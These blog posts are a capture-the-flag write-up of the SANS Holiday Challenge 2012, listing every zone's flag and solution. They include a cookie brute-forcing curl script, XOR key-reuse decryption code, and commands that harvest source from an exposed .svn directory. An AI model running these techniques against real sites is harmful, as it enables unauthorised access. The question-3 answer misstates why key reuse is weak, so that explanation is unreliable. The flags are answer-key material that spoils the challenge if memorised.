Monday, January 7, 2013

SANS Holiday Challenge 2012 Heat Miser Levels: 

 http://pen-testing.sans.org/holiday-challenge/2012


Heat Zone 0:
-- The flag for this level is 1732bcff12e6550ff9ea44d594001418 --

Heat Zone 1:
-- The flag for this level is d8c94233daef256c42bb95bd61382e02 --
 View http://heatmiser.counterhack.com/robots.txt
 Find /zone-1-E919DBF1-E4FA-4141-97C4-3F38693D2161

Heat Zone 2:
--The flag for this level is ef963731de7e886226fe4a6a6c2971f1 --
In html source of zone1.
Find /zone-2-761EBBCF-099F-4DB0-B63F-9ADC61825D49

Heat Zone 3:
-- The flag for this level is 0d524fb8d8f9f88eb9da5b286661a824 --
 tweet image : https://twitter.com/h34t_m1s3r/status/276824127359295488/photo/1
 and cold tweet clue : https://twitter.com/sn0w_m1s3r/status/276824285878812673
 adjust image with gimp and find: heatmiser.counterhack.com/zone-3-83FEE8BE-B1C6-4395-A56A-BF933FC85254/

Heat Zone 4:
-- The flag for this level is e3ae414e6d428c3b0c7cff03783e305f --
 When clicking on link with burp proxy, you will see the full page loads before the redirect due to missing exit 0;. 
There is a hint in the meme tweet.  
You can view page 4 at this point, which has a link for page 5

Heat Zone 5:
-- The flag for this level is f478c549e37fa33467241d847f862e6f --
 Identified cookie as hash of 1001 along with clue (https://twitter.com/sn0w_m1s3r/status/276871170085773312). Tried a ton of things trying to figure out what it was supposed to be.
 Finally brute forced it with the bash script below to find the answer was "1".
 z5.sh:
 #!/bin/bash
 X=`echo -n $1 | md5sum | cut -c1-32`
 curl -s -L -b UID=$X
 http://heatmiser.counterhack.com/zone-5-15614E3A-CEA7-4A28-A85A-D688CC418287
 END z5.sh


 ch@bluestem:~$ for i in {0..1001}; do echo $i; ./z5.sh $i; done  file.out

 Examined file.out logs for the one that did not have "access denied"

Posted by at No comments:
SANS Holiday Challenge 2012 Snow Miser Levels: 

 http://pen-testing.sans.org/holiday-challenge/2012

Snow Zone 0: 
-- The flag for this level is 3b5a630fc67251aa5555f4979787c93f --

Snow Zone 1: 
 -- The flag for this level is 38bef0b61ba8edda377b626fe6708bfa --
 Photo reflection in https://twitter.com/sn0w_m1s3r/status/276820932104957952/photo/1
 http://snowmiser.counterhack.com/zone-1-D2E31380-50E6-4869-8A85-F9CDB3AF6226/

Snow Zone 2:
 -- The flag for this level is b8231c2bac801b54f732cfbdcd7e47b7 --

The image off.jpg has metadata IceIceBaby! which can be used as a
 passphrase for steghide extract against off.jpg

 Data provided is "zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3"

ch@bluestem:~/snow$ exiftool off.jpg
[...]
User Comment                    : IceIceBaby!
[...]

ch@bluestem:~/snow$ steghide extract -sf off.jpg
Enter passphrase: IceIceBaby!
the file "tmpfile.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "tmpfile.txt".
ch@bluestem:~/snow$ cat tmpfile.txt
zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3


Snow Zone 3:
-- The flag for this level is 08ba610172aade5d1c8ea738013a2e99 --

 Link /zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962 found in data from
 android dump in file data/com.android.browser/cache/webviewCacheChromium/data_2 using grep.

ch@bluestem:~/snow/data$ find . -type f -exec grep -a zone-3 '{}' \;  > zone3.out
ch@bluestem:~/snow/data$ grep -a zone-3 zone3.out
[...]
/zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962/' class="menu">Zone 3
[...]


Snow Zone 4:
 -- The flag for this level is de32b158f102a60aba7de3ee8d5d265a --

 Since the "zone-4-" part of the strings would be the same and the encrypted strings started the same way, it was just a matter of working backwards from the ciphertext back to the original.

 z4.py:
 #!/bin/python

 #this is the known string "zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B"
 list1=[0x7a, 0x6f, 0x6e, 0x65, 0x2d, 0x34, 0x2d, 0x46, 0x37, 0x36,
 0x37, 0x37, 0x44, 0x41, 0x38, 0x2d, 0x33, 0x44, 0x37, 0x37, 0x2d
 , 0x31, 0x31, 0x45, 0x32, 0x2d,
  0x42, 0x42, 0x36, 0x35, 0x2d, 0x45, 0x34, 0x42, 0x46, 0x36, 0x31,
 0x38, 0x38, 0x37, 0x30, 0x39, 0x42]

 #this is the known ciphertext for string above
 list2=[0x20, 0xd9, 0x16, 0xc6, 0xc2, 0x9e, 0xe5, 0x3c, 0x30, 0xea,
 0x1e, 0xff, 0xc6, 0x3b, 0x1c, 0x72, 0x14, 0x7e, 0xb8, 0x6b, 0x99
 , 0x8a, 0x25, 0xc0, 0xcf, 0x1b,
  0xf6, 0x69, 0x39, 0xe8, 0x62, 0x1b, 0x31, 0x32, 0xd8, 0x3a, 0xbb,
 0x16, 0x83, 0xdf, 0x61, 0x92, 0x38]

 #this is known ciphertext for unknown string
 list3=[0x20, 0xd9, 0x16, 0xc6, 0xc2, 0x9e, 0xe5, 0x43, 0x43, 0xe8,
 0x1f, 0xf1, 0xb1, 0x4c, 0x13, 0x72, 0x65, 0x0c, 0xbf, 0x19, 0x99
 , 0x8f, 0x51, 0xb5, 0xc5, 0x1b,
  0xf6, 0x6f, 0x49, 0xec, 0x62, 0x18, 0x40, 0x34, 0xa9, 0x4f, 0xc9,
 0x19, 0x8f, 0xa9, 0x17, 0x98, 0x49]

 #XOR first string by ciphertext to get the key, then use that key
 against the second ciphertext to get the string

 for z in range(0,len(list1)):
         r = list1[z]
         a = list2[z]
         first = r ^ a
         print first ^ list3[z]

 :END z4.py

 and then use bash to convert output to printable ascii

 ch@bluestem:~$ python z4.py | awk '{printf "%c\n", $1}' | tr -d '\n'
 zone-4-9D469367-B60E-4E08-BDF1-FED7CC74AF33



Snow Zone 5:
 -- The flag for this level is 3ab1c5fa327343721bc798f116be8dc6 --

 The hint at : https://twitter.com/h34t_m1s3r/status/276875683228176384
 linked to the blog post at http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us explains how to get the pristine copy of the page.

ch@bluestem:~$ wget http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/wc.db
ch@bluestem:~$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
svn-base" as alpha from NODES;'
|
noaccess.php|.svn/pristine/41/4134e0e954d144ed932fd639b5a897f9ad47fff9.svn-base
index.php|.svn/pristine/7d/7d63810b0da679648fc20b4f1c84680ac08ec872.svn-base

ch@bluestem:~$ wget snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/.svn/pristine/7d/7d63810b0da679648fc20b4f1c84680ac08ec872.svn-base

Once you have this page, you learn that you need to pass the sha1 hash of "$time 7998f77a7dc74f182a76219d7ee58db38be3841c" or else you will be redirected to noaccess.php.  In noaccess.php there is a line that provides the server time.  So you need to get that time (within 3 minutes), hash it and send it back. 

Here is what I used at the time I did it: 
ch@bluestem:~$ echo -n "2012-12-20 22:36 7998f77a7dc74f182a76219d7ee58db38be3841c" | sha1sum
cdb74ef7530f56fe02fb50702611093305cf9f11

When you use this hash as the password on the Snow4 page, you will be granted access to Snow5. 








Posted by at No comments:
SANS Holiday Challenge 2012: 

 http://pen-testing.sans.org/holiday-challenge/2012

I worked through this challenge over the course of a few weeks and then went back to wrote up my solutions weeks later after the holidays.  Luckily, most of my notes and details were in my .bash_history, or else I'd have no idea how I solved many of these. 


Questions:

1. Where did you find the remainder of Snow Miser's Zone 1 URL?
It was pretty easy to see the reflection of the URL in this image from
twitter: https://twitter.com/sn0w_m1s3r/status/276820932104957952/photo/1


2. What is the key you used with steghide to extract Snow Miser's Zone
2 URL? Where did you find the key?
The key (IceIceBaby!) was in the User Comment metadata for off.jpg.
This key was used with steghide to extract the hidden url data.

ch@bluestem:~/snow$  steghide extract -sf off.jpg
steghide extract -sf off.jpg
Enter passphrase: IceIceBaby!
the file "tmpfile.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "tmpfile.txt".
ch@bluestem:~/snow$ cat tmpfile.txt
zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3


3. On Snow Miser's Zone 3 page, why is using the same key multiple
times a bad idea?
Using the same key multiple times increases  the chances that it will be cached.  This was found in the android data file data/com.android.browser/cache/webviewCacheChromium/data_2 from the
android image linked here:  https://twitter.com/h34t_m1s3r/status/276828387853611008


4. What was the coding error in Zone 4 of Heat Miser's site that
allowed you to find the URL for Zone 5?
The PHP redirect did not exit the script after running.  So the full page was downloaded and the data was visible using a proxy or tool that didn't follow the redirect.


5.  How did you manipulate the cookie to get to Zone 5 of Heat Miser's
Control System?
The cookie was the md5 sum of "1001", which was hinted at here:
https://twitter.com/sn0w_m1s3r/status/276871170085773312.  I tried replacing the cookie a  bunch of times with a lot of md5 hashes of different values.  It turned out to be the md5 sum of the number "1" that it wanted.
 6. Please briefly describe the process, steps, and tools you used to
 conquer each zone, including all of the flags hidden in the comments
 of each zone page.
Blog posts to follow
Posted by at No comments:
Subscribe to: Posts (Atom)